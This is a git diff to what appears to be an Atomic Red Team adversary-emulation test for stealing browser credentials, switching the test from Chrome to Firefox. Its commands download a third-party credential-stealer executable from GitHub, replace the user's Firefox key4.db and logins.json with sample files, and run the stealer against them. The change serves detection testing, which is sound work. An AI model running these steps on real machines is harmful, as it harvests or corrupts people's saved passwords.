diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index 0f8976d1ab..4b6b595b05 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -429,16 +429,15 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - Google Chrome must be on the device. + Firefox must be on the device. prereq_command: | - if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} + if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi - msiexec /i $installer /qn - Start-Process -FilePath "chrome.exe" - Stop-Process -Name "chrome" + $installer = "PathToAtomicsFolder\..\ExternalPayloads\FirefoxStubInstaller.exe" + Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US" + Start-Process -FilePath $installer -Wait + Stop-Process -Name "firefox" - description: | BrowserCollector must exist in the bin directory prereq_command: | @@ -447,22 +446,30 @@ atomic_tests: New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe" - description: | - Login Data file that is a copy of a chrome Login Data that contains credentials for the tool to "steal." Must exist at the specified path. + Login Data file that is a copy of a Firefox Login Data that contains credentials for the tool to "steal." Must exist at the specified path. prereq_command: |- - if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data") {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\T1555.003\src\key4.db") {exit 0} else {exit 1} get_prereq_command: |- - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json" executor: command: | - Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null - Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null - Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\" > $null + $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName + Copy-Item $profile\key4.db -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null + Copy-Item $profile\logins.json -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null + Remove-Item $profile\key4.db > $null + Remove-Item $profile\logins.json > $null + Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\key4.db" -Destination $profile\ > $null + Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\logins.json" -Destination $profile\ > $null cd "$env:PathToAtomicsFolder\T1555.003\bin" - .\BrowserCollector.exe + ""|.\BrowserCollector.exe cleanup_command: | - Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null - Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null - Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null + $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName + Remove-Item $profile\key4.db > $null + Remove-Item $profile\logins.json > $null + Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination $profile\ > $null + Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\key4.db" > $null + Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\logins.json" > $null name: powershell - name: Dump Chrome Login Data with esentutl auto_generated_guid: 70422253-8198-4019-b617-6be401b49fce diff --git a/atomics/T1555.003/bin/BrowserCollector.exe b/atomics/T1555.003/bin/BrowserCollector.exe deleted file mode 100644 index 18748d58b3..0000000000 Binary files a/atomics/T1555.003/bin/BrowserCollector.exe and /dev/null differ diff --git a/atomics/T1555.003/src/key4.db b/atomics/T1555.003/src/key4.db new file mode 100644 index 0000000000..bf8cb470fa Binary files /dev/null and b/atomics/T1555.003/src/key4.db differ diff --git a/atomics/T1555.003/src/logins.json b/atomics/T1555.003/src/logins.json new file mode 100644 index 0000000000..85e26487df --- /dev/null +++ b/atomics/T1555.003/src/logins.json @@ -0,0 +1 @@ +{"nextId":2,"logins":[{"id":1,"hostname":"https://practicetestautomation.com","httpRealm":null,"formSubmitURL":"https://practicetestautomation.com","usernameField":"username","passwordField":"password","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECJaRexB+HxT7BAhePSimnBX5dQ==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECFs3vPPQrqJqBBDDqJi5FTWY9ci3V3PAspHl","guid":"{f4496af2-67e3-4e71-a6e0-a9215c8fea68}","encType":1,"timeCreated":1702659643977,"timeLastUsed":1702659643977,"timePasswordChanged":1702659643977,"timesUsed":1,"syncCounter":1,"everSynced":false,"encryptedUnknownFields":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCB2pMUVOobJBAhvCulcD3S7Nw=="}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3} \ No newline at end of file